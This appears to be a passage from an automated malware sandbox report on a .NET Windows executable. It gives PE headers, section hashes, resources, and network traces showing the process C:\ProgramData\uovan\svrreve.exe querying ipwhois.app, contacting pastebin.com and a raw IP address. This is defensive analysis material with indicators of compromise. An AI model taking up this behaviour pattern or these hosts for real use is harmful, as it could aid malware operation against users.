                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x1c89e40x57.text
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1ca0000x1a948.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1e60000xc.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x20000x1c6a440x1c6c00e745c178efd6d368b03cd11d49e185b9False0.3997436993196811data6.279017309047847IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rsrc0x1ca0000x1a9480x1aa009d72115ed23fac7381916237372aa66eFalse0.1363519659624413data2.757367311658207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc0x1e60000xc0x200e95a990cce7a0da8236e72229210d6ccFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                          Resources

                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_ICON0x1ca2200x1bf8PNG image data, 256 x 256, 8-bit gray+alpha, non-interlaced0.9699720670391061
                          RT_ICON0x1cbe180x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3779 x 3779 px/m0.05360522891281202
                          RT_ICON0x1dc6400x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 3779 x 3779 px/m0.08585262163438828
                          RT_ICON0x1e08680x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m0.10715767634854771
                          RT_ICON0x1e2e100x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m0.14047842401500937
                          RT_ICON0x1e3eb80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/m0.225177304964539
                          RT_GROUP_ICON0x1e43200x5adata0.7333333333333333
                          RT_VERSION0x1e437c0x3e0data0.42439516129032256
                          RT_MANIFEST0x1e475c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                          Imports

                          DLLImport
                          mscoree.dll_CorExeMain

                          Network Behavior

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Jun 25, 2024 14:55:41.428359032 CEST49731443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:41.428411007 CEST44349731195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:41.428522110 CEST49731443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:41.643438101 CEST49731443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:41.643466949 CEST44349731195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:42.498527050 CEST44349731195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:42.498609066 CEST49731443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:42.507380962 CEST49731443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:42.507405996 CEST44349731195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:42.507808924 CEST44349731195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:42.561800957 CEST49731443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:42.691817999 CEST49731443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:42.732507944 CEST44349731195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:42.887257099 CEST44349731195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:42.887373924 CEST44349731195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:42.887448072 CEST49731443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:42.970624924 CEST49731443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:42.992867947 CEST49732443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:42.992950916 CEST44349732195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:42.993046045 CEST49732443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:42.993362904 CEST49732443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:42.993381977 CEST44349732195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:43.665404081 CEST44349732195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:43.670008898 CEST49732443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:43.670048952 CEST44349732195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:44.002316952 CEST44349732195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:44.002404928 CEST44349732195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:44.002511024 CEST49732443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:44.059807062 CEST49732443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:44.060892105 CEST49733443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:44.060937881 CEST44349733195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:44.061019897 CEST49733443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:44.069515944 CEST49733443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:44.069552898 CEST44349733195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:44.718449116 CEST44349733195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:44.721235037 CEST49733443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:44.721265078 CEST44349733195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:45.051407099 CEST44349733195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:45.051517963 CEST44349733195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:45.051589966 CEST49733443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:45.053287983 CEST49733443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:45.061749935 CEST49734443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:45.061789036 CEST44349734195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:45.061876059 CEST49734443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:45.062649965 CEST49734443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:45.062669992 CEST44349734195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:45.702471018 CEST44349734195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:45.704745054 CEST49734443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:45.704771996 CEST44349734195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:46.028053999 CEST44349734195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:46.028156042 CEST44349734195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:46.028219938 CEST49734443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:46.028827906 CEST49734443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:46.030019999 CEST49735443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:46.030059099 CEST44349735195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:46.030132055 CEST49735443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:46.030471087 CEST49735443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:46.030484915 CEST44349735195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:46.897473097 CEST44349735195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:46.905102968 CEST49735443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:46.905138969 CEST44349735195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:47.275259018 CEST44349735195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:47.275373936 CEST44349735195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:47.275527000 CEST49735443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:47.276228905 CEST49735443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:47.277180910 CEST49736443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:47.277215958 CEST44349736195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:47.277337074 CEST49736443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:47.277513027 CEST49736443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:47.277529955 CEST44349736195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:48.307568073 CEST44349736195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:48.308777094 CEST49736443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:48.308819056 CEST44349736195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:48.645020008 CEST44349736195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:48.645257950 CEST44349736195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:48.645361900 CEST49736443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:48.645874023 CEST49736443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:48.647257090 CEST49737443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:48.647315025 CEST44349737195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:48.647406101 CEST49737443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:48.647675037 CEST49737443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:48.647684097 CEST44349737195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:49.677148104 CEST44349737195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:49.678584099 CEST49737443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:49.678613901 CEST44349737195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:50.204684973 CEST44349737195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:50.204885006 CEST44349737195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:50.204952955 CEST49737443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:50.205748081 CEST49737443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:50.207185984 CEST49738443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:50.207215071 CEST44349738195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:50.207288980 CEST49738443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:50.207607985 CEST49738443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:50.207622051 CEST44349738195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:50.870676041 CEST44349738195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:50.872936964 CEST49738443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:50.872975111 CEST44349738195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:51.200402021 CEST44349738195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:51.200525045 CEST44349738195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:51.200573921 CEST49738443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:51.201174021 CEST49738443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:51.202182055 CEST49739443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:51.202229023 CEST44349739195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:51.202322006 CEST49739443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:51.202666998 CEST49739443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:51.202683926 CEST44349739195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:51.853219032 CEST44349739195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:51.854948997 CEST49739443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:51.854989052 CEST44349739195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:52.186855078 CEST44349739195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:52.187071085 CEST44349739195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:52.187175035 CEST49739443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:52.187690973 CEST49739443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:56.276913881 CEST49745443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:56.276962042 CEST44349745195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:56.277215004 CEST49745443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:56.284008980 CEST49745443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:56.284027100 CEST44349745195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:56.980242014 CEST44349745195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:56.980348110 CEST49745443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:57.004913092 CEST49745443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:57.004929066 CEST44349745195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:57.005474091 CEST44349745195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:57.046207905 CEST49745443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:57.231684923 CEST49745443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:57.272504091 CEST44349745195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:57.426143885 CEST44349745195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:57.426261902 CEST44349745195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:57.426317930 CEST49745443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:57.430488110 CEST49745443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:57.431529045 CEST49747443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:57.431567907 CEST44349747195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:57.431639910 CEST49747443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:57.431907892 CEST49747443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:57.431920052 CEST44349747195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:58.085095882 CEST44349747195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:58.093996048 CEST49747443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:58.094016075 CEST44349747195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:58.419496059 CEST44349747195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:58.419586897 CEST44349747195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:58.419708014 CEST49747443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:58.420259953 CEST49747443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:58.421474934 CEST49748443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:58.421525955 CEST44349748195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:58.421627045 CEST49748443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:58.422017097 CEST49748443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:58.422029018 CEST44349748195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:59.085645914 CEST44349748195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:59.087605000 CEST49748443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:59.087641001 CEST44349748195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:59.418937922 CEST44349748195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:59.419034004 CEST44349748195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:59.419152975 CEST49748443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:59.423299074 CEST49748443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:59.427670002 CEST49749443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:59.427719116 CEST44349749195.201.57.90192.168.2.4
                          Jun 25, 2024 14:55:59.427800894 CEST49749443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:59.431621075 CEST49749443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:55:59.431653023 CEST44349749195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:00.076240063 CEST44349749195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:00.077636003 CEST49749443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:00.077656031 CEST44349749195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:00.404958010 CEST44349749195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:00.405054092 CEST44349749195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:00.405208111 CEST49749443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:00.405591965 CEST49749443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:00.406380892 CEST49750443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:00.406413078 CEST44349750195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:00.406703949 CEST49750443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:00.406832933 CEST49750443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:00.406847000 CEST44349750195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:01.075680971 CEST44349750195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:01.077016115 CEST49750443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:01.077043056 CEST44349750195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:01.411300898 CEST44349750195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:01.411412954 CEST44349750195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:01.411510944 CEST49750443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:01.412157059 CEST49750443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:01.413146019 CEST49751443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:01.413192034 CEST44349751195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:01.413264990 CEST49751443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:01.413471937 CEST49751443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:01.413486004 CEST44349751195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:02.079979897 CEST44349751195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:02.081149101 CEST49751443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:02.081176996 CEST44349751195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:02.418127060 CEST44349751195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:02.418232918 CEST44349751195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:02.418333054 CEST49751443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:02.421781063 CEST49751443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:02.424602985 CEST49752443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:02.424623966 CEST44349752195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:02.425116062 CEST49752443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:02.432285070 CEST49752443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:02.432295084 CEST44349752195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:03.089972019 CEST44349752195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:03.091456890 CEST49752443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:03.091473103 CEST44349752195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:03.420692921 CEST44349752195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:03.420783043 CEST44349752195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:03.420835972 CEST49752443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:03.421591997 CEST49752443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:03.422733068 CEST49753443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:03.422772884 CEST44349753195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:03.422843933 CEST49753443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:03.423111916 CEST49753443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:03.423125029 CEST44349753195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:04.066106081 CEST44349753195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:04.067651987 CEST49753443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:04.067686081 CEST44349753195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:04.391880989 CEST44349753195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:04.391977072 CEST44349753195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:04.392045975 CEST49753443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:04.392939091 CEST49753443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:04.393908024 CEST49754443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:04.393933058 CEST44349754195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:04.394103050 CEST49754443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:04.394524097 CEST49754443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:04.394536018 CEST44349754195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:05.062500000 CEST44349754195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:05.063877106 CEST49754443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:05.063900948 CEST44349754195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:05.395412922 CEST44349754195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:05.395513058 CEST44349754195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:05.395610094 CEST49754443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:05.404007912 CEST49754443192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:21.919306040 CEST49755443192.168.2.4172.67.19.24
                          Jun 25, 2024 14:56:21.919347048 CEST44349755172.67.19.24192.168.2.4
                          Jun 25, 2024 14:56:21.919447899 CEST49755443192.168.2.4172.67.19.24
                          Jun 25, 2024 14:56:21.949754953 CEST49755443192.168.2.4172.67.19.24
                          Jun 25, 2024 14:56:21.949783087 CEST44349755172.67.19.24192.168.2.4
                          Jun 25, 2024 14:56:22.409884930 CEST44349755172.67.19.24192.168.2.4
                          Jun 25, 2024 14:56:22.410017014 CEST49755443192.168.2.4172.67.19.24
                          Jun 25, 2024 14:56:22.430248022 CEST49755443192.168.2.4172.67.19.24
                          Jun 25, 2024 14:56:22.430270910 CEST44349755172.67.19.24192.168.2.4
                          Jun 25, 2024 14:56:22.430619001 CEST44349755172.67.19.24192.168.2.4
                          Jun 25, 2024 14:56:22.440834999 CEST49755443192.168.2.4172.67.19.24
                          Jun 25, 2024 14:56:22.488496065 CEST44349755172.67.19.24192.168.2.4
                          Jun 25, 2024 14:56:22.942024946 CEST44349755172.67.19.24192.168.2.4
                          Jun 25, 2024 14:56:22.942161083 CEST44349755172.67.19.24192.168.2.4
                          Jun 25, 2024 14:56:22.942222118 CEST49755443192.168.2.4172.67.19.24
                          Jun 25, 2024 14:56:22.947494984 CEST49755443192.168.2.4172.67.19.24
                          Jun 25, 2024 14:56:23.549159050 CEST4975780192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:23.554735899 CEST8049757195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:23.555691957 CEST4975780192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:23.555915117 CEST4975780192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:23.563924074 CEST8049757195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:24.195254087 CEST8049757195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:24.195297956 CEST8049757195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:24.195384979 CEST4975780192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:24.220315933 CEST4975980192.168.2.4172.86.105.109
                          Jun 25, 2024 14:56:24.225420952 CEST8049759172.86.105.109192.168.2.4
                          Jun 25, 2024 14:56:24.225503922 CEST4975980192.168.2.4172.86.105.109
                          Jun 25, 2024 14:56:24.225759029 CEST4975980192.168.2.4172.86.105.109
                          Jun 25, 2024 14:56:24.230700970 CEST8049759172.86.105.109192.168.2.4
                          Jun 25, 2024 14:56:24.593317986 CEST4975780192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:24.598547935 CEST8049757195.201.57.90192.168.2.4
                          Jun 25, 2024 14:56:24.598604918 CEST4975780192.168.2.4195.201.57.90
                          Jun 25, 2024 14:56:24.720172882 CEST4975980192.168.2.4172.86.105.109
                          Jun 25, 2024 14:56:24.725250959 CEST8049759172.86.105.109192.168.2.4
                          Jun 25, 2024 14:56:24.765176058 CEST4975980192.168.2.4172.86.105.109
                          Jun 25, 2024 14:56:24.770004988 CEST8049759172.86.105.109192.168.2.4
                          Jun 25, 2024 14:56:24.770077944 CEST4975980192.168.2.4172.86.105.109
                          Jun 25, 2024 14:56:24.774928093 CEST8049759172.86.105.109192.168.2.4
                          Jun 25, 2024 14:56:25.619870901 CEST8049759172.86.105.109192.168.2.4
                          Jun 25, 2024 14:56:25.620069981 CEST4975980192.168.2.4172.86.105.109
                          Jun 25, 2024 14:56:25.690557957 CEST4975980192.168.2.4172.86.105.109
                          Jun 25, 2024 14:56:25.695507050 CEST8049759172.86.105.109192.168.2.4

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Jun 25, 2024 14:55:41.372880936 CEST6369353192.168.2.41.1.1.1
                          Jun 25, 2024 14:55:41.397761106 CEST53636931.1.1.1192.168.2.4
                          Jun 25, 2024 14:56:21.904125929 CEST5138453192.168.2.41.1.1.1
                          Jun 25, 2024 14:56:21.911163092 CEST53513841.1.1.1192.168.2.4

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Jun 25, 2024 14:55:41.372880936 CEST192.168.2.41.1.1.10xac29Standard query (0)ipwhois.appA (IP address)IN (0x0001)false
                          Jun 25, 2024 14:56:21.904125929 CEST192.168.2.41.1.1.10xb2bdStandard query (0)pastebin.comA (IP address)IN (0x0001)false

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Jun 25, 2024 14:55:41.397761106 CEST1.1.1.1192.168.2.40xac29No error (0)ipwhois.app195.201.57.90A (IP address)IN (0x0001)false
                          Jun 25, 2024 14:56:21.911163092 CEST1.1.1.1192.168.2.40xb2bdNo error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                          Jun 25, 2024 14:56:21.911163092 CEST1.1.1.1192.168.2.40xb2bdNo error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                          Jun 25, 2024 14:56:21.911163092 CEST1.1.1.1192.168.2.40xb2bdNo error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false

                          HTTP Request Dependency Graph

                          • ipwhois.app
                          • pastebin.com
                          • 172.86.105.109

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.449757195.201.57.90807536C:\ProgramData\uovan\svrreve.exe
                          TimestampBytes transferredDirectionData
                          Jun 25, 2024 14:56:23.555915117 CEST65OUTGET /xml/ HTTP/1.1
                          Host: ipwhois.app
                          Connection: Keep-Alive
                          Jun 25, 2024 14:56:24.195254087 CEST1236INHTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 12:56:24 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Server: ipwhois
                          Access-Control-Allow-Origin: *
                          Access-Control-Allow-Headers: *
                          X-Robots-Tag: noindex
